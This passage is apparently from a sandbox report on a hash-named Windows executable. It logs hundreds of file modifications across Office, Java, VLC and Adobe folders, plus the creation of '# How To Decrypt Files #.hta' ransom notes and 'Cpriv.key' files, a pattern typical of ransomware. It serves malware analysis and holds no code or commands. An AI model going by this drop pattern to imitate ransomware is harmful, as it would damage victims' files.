Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\BREEZE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EssentialResume.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\msadc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\ADDINS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187815.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0301052.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00505_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\id\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02443_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR10F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\SAMPLES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01293_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00334_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsImageTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART9.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCD11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\6.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14984_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CASCADE\CASCADE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01044_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_underline.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0287005.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107262.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Technic.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceYi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00438_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL087.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_top.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Couture.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\REPTWIZ.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEB11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceArray.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB8.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18209_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18247_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Doc.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Person.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\clock.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Services\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086426.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115839.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_ring_docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FALL_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR25F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\WHITEBOX.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\offset.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00932_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\SmallLogoCanary.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\AdjacencyMergeLetter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\BUZZ.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WORDREP.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\IPIRMV.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GreenTea.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\calendar.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\en-US\# How To Decrypt Files #.hta 